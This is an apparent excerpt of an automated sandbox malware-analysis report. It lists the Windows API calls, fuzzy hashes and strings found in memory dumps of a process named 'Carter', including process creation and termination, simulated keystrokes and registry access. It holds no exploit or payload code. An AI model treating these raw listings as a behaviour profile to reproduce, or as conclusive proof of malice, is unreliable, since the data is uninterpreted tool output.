                                                                        • Instruction Fuzzy Hash: 4EF14F71A00209EFDF54DF98C884EAEB7B9FF49318F108099F945AB255DB31AE45CB50
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0105FD9E
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0105FF31
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0105FF55
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0105FF95
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0105FFB7
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01060133
                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 01060165
                                                                        • CloseHandle.KERNEL32(?), ref: 01060194
                                                                        • CloseHandle.KERNEL32(?), ref: 0106020B
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                        • String ID:
                                                                        • API String ID: 4090791747-0
                                                                        • Opcode ID: 7893a01e8d00323b55669fea09152eb360da11308a7bbff5aa3865a3ac5d2b11
                                                                        • Instruction ID: 6b216f85081080a5a8df047d3d1b1b439b748fbab334989413853609b95db63c
                                                                        • Opcode Fuzzy Hash: 7893a01e8d00323b55669fea09152eb360da11308a7bbff5aa3865a3ac5d2b11
                                                                        • Instruction Fuzzy Hash: 5DE1BC312043429FD765EF28C890A6FBBE5AF85314F14895DF9C99B2A2CB35EC01CB52
                                                                        APIs
                                                                          • Part of subcall function 01044BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01043B8A,?), ref: 01044BE0
                                                                          • Part of subcall function 01044BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01043B8A,?), ref: 01044BF9
                                                                          • Part of subcall function 01044FEC: GetFileAttributesW.KERNEL32(?,01043BFE), ref: 01044FED
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 010452FB
                                                                        • _wcscmp.LIBCMT ref: 01045315
                                                                        • MoveFileW.KERNEL32(?,?), ref: 01045330
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 793581249-0
                                                                        • Opcode ID: 527ede653dbc2112528623ae168235c9c8282be057caf553dabb7140cfcba4f7
                                                                        • Instruction ID: d747e59dfd052e5db13c03212ffd9c699c1ecbf5c9cd44dd798d4c13a74b8482
                                                                        • Opcode Fuzzy Hash: 527ede653dbc2112528623ae168235c9c8282be057caf553dabb7140cfcba4f7
                                                                        • Instruction Fuzzy Hash: 105171F24083859BD765EBA4DC809DFB7ECAF95201F10492EF2C9D7151EF34A2888766
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 01068D24
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 6dfc2db023334dabf13447e261b1c7a169bbfe7b8a191f75ae559ec7bcbb3adc
                                                                        • Instruction ID: 255ee51090ea360c08d12922342c8e5a79517f17fe26bc635bacc631f36d90bb
                                                                        • Opcode Fuzzy Hash: 6dfc2db023334dabf13447e261b1c7a169bbfe7b8a191f75ae559ec7bcbb3adc
                                                                        • Instruction Fuzzy Hash: 8D51B070640308BFEF70AE28CC88B9D7FACAB15320F148653F695EB195C776A980CB50
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0101C638
                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0101C65A
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0101C672
                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0101C690
                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0101C6B1
                                                                        • DestroyIcon.USER32(00000000), ref: 0101C6C0
                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0101C6DD
                                                                        • DestroyIcon.USER32(?), ref: 0101C6EC
                                                                          • Part of subcall function 0106AAD4: DeleteObject.GDI32(00000000), ref: 0106AB0D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                                        • String ID:
                                                                        • API String ID: 2819616528-0
                                                                        • Opcode ID: 4d00bada280271d248718c88d013d0f59f7f908a94ee969bdd71557e33e96766
                                                                        • Instruction ID: 7aa16f96fc242eb9ce0def4bdc5ea495dad0ceffa45793257e5c4fec2ec9a5b4
                                                                        • Opcode Fuzzy Hash: 4d00bada280271d248718c88d013d0f59f7f908a94ee969bdd71557e33e96766
                                                                        • Instruction Fuzzy Hash: 7E518E70A40245AFEB60DF25CD45BAA7BF9FB48710F104618F982E7294EB75E890EB50
                                                                        APIs
                                                                          • Part of subcall function 0103B52D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0103B54D
                                                                          • Part of subcall function 0103B52D: GetCurrentThreadId.KERNEL32 ref: 0103B554
                                                                          • Part of subcall function 0103B52D: AttachThreadInput.USER32(00000000,?,0103A23B,?,00000001), ref: 0103B55B
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0103A246
                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 0103A263
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 0103A266
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0103A26F
                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 0103A28D
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0103A290
                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 0103A299
                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 0103A2B0
                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 0103A2B3
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                        • String ID:
                                                                        • API String ID: 2014098862-0
                                                                        • Opcode ID: 6d5975cf6b7169f365754d144548da0901002d3e80e5b9ae7ba7035ebab4fed7
                                                                        • Instruction ID: 006adae5badd06a289a3bc6269e4e1866cccb982d84bbfe08e7e533c011521cc
                                                                        • Opcode Fuzzy Hash: 6d5975cf6b7169f365754d144548da0901002d3e80e5b9ae7ba7035ebab4fed7
                                                                        • Instruction Fuzzy Hash: B6110871950218BEF6206F649C49F6A3F1DDB8D764F201519F380AB0C4C9F75C50CBA0
                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0103915A,00000B00,?,?), ref: 010394E2
                                                                        • HeapAlloc.KERNEL32(00000000,?,0103915A,00000B00,?,?), ref: 010394E9
                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0103915A,00000B00,?,?), ref: 010394FE
                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0103915A,00000B00,?,?), ref: 01039506
                                                                        • DuplicateHandle.KERNEL32(00000000,?,0103915A,00000B00,?,?), ref: 01039509
                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0103915A,00000B00,?,?), ref: 01039519
                                                                        • GetCurrentProcess.KERNEL32(0103915A,00000000,?,0103915A,00000B00,?,?), ref: 01039521
                                                                        • DuplicateHandle.KERNEL32(00000000,?,0103915A,00000B00,?,?), ref: 01039524
                                                                        • CreateThread.KERNEL32(00000000,00000000,0103954A,00000000,00000000,00000000), ref: 0103953E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                        • String ID:
                                                                        • API String ID: 1957940570-0
                                                                        • Opcode ID: 605ad17026970d1ffc4d85182382c5b848b2040e99cc9dd319aae081c4a0c192
                                                                        • Instruction ID: f63e15ff475144235eef531a6d3ca1806d38550f4cf3b39d2121d32a97b19493
                                                                        • Opcode Fuzzy Hash: 605ad17026970d1ffc4d85182382c5b848b2040e99cc9dd319aae081c4a0c192
                                                                        • Instruction Fuzzy Hash: E801CDB5640304BFE720AFA5EC4DF6B7BACEB89711F004511FA45EB199CAB69800CB30
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                        • API String ID: 0-572801152
                                                                        • Opcode ID: fb97cc94be901eb27466b5ee02b354df80abbb098ba35b6ccc8d869b193f1227
                                                                        • Instruction ID: 4e05a140ace78067865f595a2b8ce1a73c90c64aeb0f36901171be578633bd1b
                                                                        • Opcode Fuzzy Hash: fb97cc94be901eb27466b5ee02b354df80abbb098ba35b6ccc8d869b193f1227
                                                                        • Instruction Fuzzy Hash: 47C17171B0021ADFDF90CF98C884AAFBBF5FB48354F148669EE85AB241E7709945CB50
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$_memset
                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                        • API String ID: 2862541840-625585964
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01067449
                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 0106745D
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01067477
                                                                        • _wcscat.LIBCMT ref: 010674D2
                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 010674E9
                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01067517
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: MessageSend$Window_wcscat
                                                                        • String ID: SysListView32
                                                                        • API String ID: 307300125-78025650
                                                                        APIs
                                                                          • Part of subcall function 01044148: CreateToolhelp32Snapshot.KERNEL32 ref: 0104416D
                                                                          • Part of subcall function 01044148: Process32FirstW.KERNEL32(00000000,?), ref: 0104417B
                                                                          • Part of subcall function 01044148: CloseHandle.KERNEL32(00000000), ref: 01044245
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0105F08D
                                                                        • GetLastError.KERNEL32 ref: 0105F0A0
                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0105F0CF
                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0105F14C
                                                                        • GetLastError.KERNEL32(00000000), ref: 0105F157
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0105F18C
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                        • String ID: SeDebugPrivilege
                                                                        • API String ID: 2533919879-2896544425
                                                                        APIs
                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 0104357C
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: blank$info$question$stop$warning
                                                                        • API String ID: 2457776203-404129466
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01044802
                                                                        • LoadStringW.USER32(00000000), ref: 01044809
                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0104481F
                                                                        • LoadStringW.USER32(00000000), ref: 01044826
                                                                        • _wprintf.LIBCMT ref: 0104484C
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0104486A
                                                                        Strings
                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 01044847
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                        • API String ID: 3648134473-3128320259
                                                                        APIs
                                                                          • Part of subcall function 00FE29E2: GetWindowLongW.USER32(?,000000EB), ref: 00FE29F3
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0106DB42
                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0106DB62
                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0106DD9D
                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0106DDBB
                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0106DDDC
                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0106DDFB
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0106DE20
                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0106DE43
                                                                        Similarity
                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                        • String ID:
                                                                        • API String ID: 1211466189-0
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0106147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0106040D,?,?), ref: 01061491
                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0106044E
                                                                        Similarity
                                                                        • API ID: BuffCharConnectRegistryUpper_memmove
                                                                        • String ID:
                                                                        • API String ID: 3479070676-0
                                                                        APIs
                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0101C508,00000004,00000000,00000000,00000000), ref: 00FE2E9F
                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0101C508,00000004,00000000,00000000,00000000,000000FF), ref: 00FE2EE7
                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0101C508,00000004,00000000,00000000,00000000), ref: 0101C55B
                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0101C508,00000004,00000000,00000000,00000000), ref: 0101C5C7
                                                                        Similarity
                                                                        • API ID: ShowWindow
                                                                        • String ID:
                                                                        • API String ID: 1268545403-0
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 01047698
                                                                          • Part of subcall function 01000FE6: std::exception::exception.LIBCMT ref: 0100101C
                                                                          • Part of subcall function 01000FE6: __CxxThrowException@8.LIBCMT ref: 01001031
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 010476CF
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 010476EB
                                                                        • _memmove.LIBCMT ref: 01047739
                                                                        • _memmove.LIBCMT ref: 01047756
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 01047765
                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0104777A
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 01047799
                                                                        Similarity
                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 256516436-0
                                                                        APIs
                                                                        • DeleteObject.GDI32(00000000), ref: 01066810
                                                                        • GetDC.USER32(00000000), ref: 01066818
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 01066823
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0106682F
                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0106686B
                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0106687C
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0106964F,?,?,000000FF,00000000,?,000000FF,?), ref: 010668B6
                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010668D6
                                                                        Similarity
                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                        • String ID:
                                                                        • API String ID: 3864802216-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _memcmp
                                                                        • String ID:
                                                                        APIs
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                          • Part of subcall function 00FF436A: _wcscpy.LIBCMT ref: 00FF438D
                                                                        • _wcstok.LIBCMT ref: 0104F2D7
                                                                        • _wcscpy.LIBCMT ref: 0104F366
                                                                        • _memset.LIBCMT ref: 0104F399
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                        • String ID: X
                                                                        APIs
                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 010572EB
                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0105730C
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0105731F
                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 010573D5
                                                                        • inet_ntoa.WSOCK32(?), ref: 01057392
                                                                          • Part of subcall function 0103B4EA: _strlen.LIBCMT ref: 0103B4F4
                                                                          • Part of subcall function 0103B4EA: _memmove.LIBCMT ref: 0103B516
                                                                        • _strlen.LIBCMT ref: 0105742F
                                                                        • _memmove.LIBCMT ref: 01057498
                                                                        Similarity
                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                        • String ID:
                                                                        APIs
                                                                        • IsWindow.USER32(011F5FB0), ref: 0106BA5D
                                                                        • IsWindowEnabled.USER32(011F5FB0), ref: 0106BA69
                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0106BB4D
                                                                        • SendMessageW.USER32(011F5FB0,000000B0,?,?), ref: 0106BB84
                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0106BBC1
                                                                        • GetWindowLongW.USER32(011F5FB0,000000EC), ref: 0106BBE3
                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0106BBFB
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                        • String ID:
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0105FB31
                                                                        • _memset.LIBCMT ref: 0105FBFA
                                                                        • ShellExecuteExW.SHELL32(?), ref: 0105FC3F
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                          • Part of subcall function 00FF436A: _wcscpy.LIBCMT ref: 00FF438D
                                                                        • GetProcessId.KERNEL32(00000000), ref: 0105FCB6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0105FCE5
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                        • String ID: @
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 0104178B
                                                                        • GetKeyboardState.USER32(?), ref: 010417A0
                                                                        • SetKeyboardState.USER32(?), ref: 01041801
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0104182F
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0104184E
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 01041894
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010418B7
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        APIs
                                                                        • GetParent.USER32(00000000), ref: 010415A4
                                                                        • GetKeyboardState.USER32(?), ref: 010415B9
                                                                        • SetKeyboardState.USER32(?), ref: 0104161A
                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01041646
                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01041663
                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 010416A7
                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 010416C8
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: _wcsncpy$LocalTime
                                                                        • String ID:
                                                                        APIs
                                                                          • Part of subcall function 01044BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01043B8A,?), ref: 01044BE0
                                                                          • Part of subcall function 01044BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01043B8A,?), ref: 01044BF9
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 01043BAA
                                                                        • _wcscmp.LIBCMT ref: 01043BC6
                                                                        • MoveFileW.KERNEL32(?,?), ref: 01043BDE
                                                                        • _wcscat.LIBCMT ref: 01043C26
                                                                        • SHFileOperationW.SHELL32(?), ref: 01043C92
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                        • String ID: \*.*
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 010678CF
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01067976
                                                                        • IsMenu.USER32(?), ref: 0106798E
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010679D6
                                                                        • DrawMenuBar.USER32 ref: 010679E9
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                        • String ID: 0
                                                                        • API String ID: 3866635326-4108050209
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01061631
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0106165B
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 01061712
                                                                          • Part of subcall function 01061602: RegCloseKey.ADVAPI32(?), ref: 01061678
                                                                          • Part of subcall function 01061602: FreeLibrary.KERNEL32(?), ref: 010616CA
                                                                          • Part of subcall function 01061602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 010616ED
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 010616B5
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
